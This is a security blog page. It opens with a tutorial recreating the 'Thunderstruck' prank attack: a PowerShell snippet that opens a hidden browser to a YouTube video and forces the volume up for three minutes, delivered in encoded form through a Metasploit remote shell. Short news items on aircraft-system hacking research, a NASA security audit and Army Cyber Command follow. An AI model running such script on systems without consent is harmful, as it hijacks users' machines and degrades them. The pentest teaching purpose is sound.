Recreating Iran AC/DC Thunderstruck Worm with PowerShell & Metasploit

Iran Thunderstruck

About three years ago computer workstations at two Iranian nuclear facilities allegedly began playing AC/DC’s Thunderstruck at random times and at full volume. How cool would it be to use this during your next computer security pentest?

Well, you can!

In this tutorial we will see how to recreate this cool attack with PowerShell and use it with Metasploit in Kali Linux.

But first some disclaimers:

Unless you are in an American or allied cyber unit, trying to infect a foreign nation’s nuclear computers is pretty much a no,no – so don’t do it. Actually using this against any systems that you do not have express written permission to do so will probably end you up in jail – so again, don’t do it. Lastly, this is not new, it is from a PowerShell script that is about 2 years old.

In this tutorial we will be borrowing the PowerShell code to play AC/DC’s hit song at full volume from a botnet script written by Christopher “@obscuresec” Campbel. If you did not see his 2013 Shmoocon talk, “Building a PowerShell Bot”, check this out:

The code can be found at his Github site.

We will also be using a technique by Mubix to encode the PowerShell script so we can deliver it via Meterpreter.

Lastly we will need a willing Windows 7 system as a target, this attack did not seem to work very well using a VMware virtual machine for a target (the up volume loop seems to bog systems down pretty good), so I used a stand alone system.

Playing “Thunderstruck” on a remote system:

1. From obscuresec’s botnet code, grab the Thunderstruck section:

[string] $VideoURL = “http://www.youtube.com/watch?v=v2AC41dglnM”
#Create hidden IE Com Object
$IEComObject = New-Object -com “InternetExplorer.Application”
$IEComObject.visible = $False
$IEComObject.navigate($VideoURL)
$EndTime = (Get-Date).addminutes(3)
Write-Verbose “Loop will end at $EndTime”
#ghetto way to do this but it basically presses volume up to raise volume in a loop for 3 minutes
do {
$WscriptObject = New-Object -com wscript.shell
$WscriptObject.SendKeys([char]175)
}
until ((Get-Date) -gt $EndTime)

The VideoURL string sets the song, which is of course, Thunderstruck. The $IEComObject section tells PowerShell to open Internet Explorer on the target system and navigate to the YouTube video. ** Note ** the .visible = $False section tells PowerShell to hide the IE window so that it does not show up. Set this to $True if you want to be able to see the Internet Explorer window.

The rest of the script creates a 3 minute loop (the length of the song) where the Up Volume key (char 175) is called repeatedly. As mentioned earlier, this loop seems to really draw down the target computer, you may want to set it to a shorter time period.

2. Put the code in a text file, which I called “Thunderstruck.txt“.

3. Base64 encode the script:

Iran Thunderstruck 2

And that is it, now all we need to do is use Metasploit to get a remote shell to the target system and then call the encoded script in our remote shell using PowerShell, like so:

Iran Thunderstruck 3

And that is it, after a short pause the target remote system will begin playing “Thunderstruck” at maximum volume. If the user tries to turn down the volume using the speaker icon, it will fight them by turning it back up until the song is over!

Iran Thunderstruck 4

Defending against this attack

The bad thing about PowerShell based attacks is that most Anti-Viruses and Windows do not see them as malicious. So your best bet is to never, ever open unsolicited attachments you receive in social media sites or via e-mails. Also, run script blocking programs to prevent unwanted scripts from running on sites that you visit. Lastly, never, ever try to build nuclear weapons!

Advertisements

Hacking Airplanes with SIMON and PlaneSploit

Title Image from Hugo Teso's HiTB Presentation
Title Image from Hugo Teso’s HiTB Presentation

For those that thought hacking car systems or medical devices was bad, what if airplane systems were exploitable? Could you access a planes secured communication system and monitor it or even worse, take over the plane?

At this year’s Amsterdam Hack in The Box Security Conference, security researcher Hugo Teso demonstrated how this could be done…

From an Android Smartphone…

Teso is not only a security researcher, but also a commercial airline pilot. He created a test lab using airplane communication hardware that he was able to buy online. He then analyzed the system and created his own exploit code called SIMON and a custom smartphone app called PlaneSploit.

According to Forbes, Teso told the crowd that he could send radio signals to planes that would cause them to execute arbitrary commands such as changes in direction, altitude, speed, and the pilots’ displays.

And in a phone interview with Forbes’ Andy Greenburg Teso said, “You can use this system to modify approximately everything related to the navigation of the plane, that includes a lot of nasty things.”

He was able to acquire all the hardware needed online through sites like Ebay. According to his slide presentation, amazingly some of the parts were as cheap as $9.99:

ACARS

And he found many of the communications signals were not encrypted or used very light security. He was able to do everything from passively eavesdropping on the signals to using active attacks like jamming, replay and complete signal injection.

Teso is working with airline authorities to help rectify the situation. And no, he is not releasing the exploit code, so you won’t see a PlaneSploit module in Backtrack any time soon!

For more information check out his Presentation slide show on the HitB website.

NASA Systems still Vulnerable to Attack even after Warnings

Serious security gaps were found in NASA computers during a recent security audit. According to MSNBC:

“Six computer servers associated with IT [information technology] assets that control spacecraft and contain critical data had vulnerabilities that would allow a remote attacker to take control of or render them unavailable,” the audit report released Monday by Inspector General Paul K. Martin said.

“The attacker could use the compromised computers to exploit other weaknesses we identified, a situation that could severely degrade or cripple NASA’s operations,” the report continued. “We also found network servers that revealed encryption keys, encrypted passwords, and user account information to potential attackers.”

Lets be realistic though, NASA is a very large organization and just by sheer volume would make securing all their systems a very daunting task. But also according to the article, NASA was specifically warned about security lapses and a plan was recommended for remediation:

“In a May 2010 audit report, we recommended that NASA immediately establish an IT security oversight program for this key network,” Monday’s report reads. “However, even though the agency concurred with the recommendation it remained unimplemented as of February 2011.”

I really find this stunning, as NASA has had a very long history with dealing with hackers. They have run the gamut from simple web defacements to more serious penetrations and data theft. A short list of attacks that NASA has faced includes:

  • 2001-2002 – The well known Gary McKinnon penetration. He claimed he was looking for secret information on UFO’s.
  • 2003 – The “Trippin Smurfs” – Jet Propulsion Labs defacement.
  • 2009 – Jeremy Parker Penetration – Accessed a NASA pay service for the science community that provided Oceanic Data recorded from satellites (which is now free).
  • 2009 – The “Code.Breaker” SQL Injection attack – NASA’s “Instrument Systems and Technology Divisions” and “Software Engineering Division” were breached via SQL injection attack. 25 Administrator accounts were compromised.

And let’s not forget about when a couple JPL sites were offering Viagra, and NASA’s twitter site was offering TV’s for sale last year.

Sure, some of these side on the ridiculous, but the fact remains, NASA has faced several serious data attacks over the years.

NASA isn’t just all about space exploration either, they do a lot of scientific research and joint military projects. The fact that a government run entity has been attacked, and then apparently ignored a plan to remedy the situation speaks volumes about our nations ability, or maybe better said desire, to thwart hacking attempts.

Effective Groundwork being created for Army’s Cyber Command

The Army’s new Cyber Command  is up and running, but it is still a work in progress. Although it achieved full operational status in October 2010, the new command is still in a growth phase, acquiring new personnel and honing its mission to defend the service’s computer networks. The command is also refining and coordinating its operational role with other Army and Defense Department organizations. 

Read the full story at Government Computer News.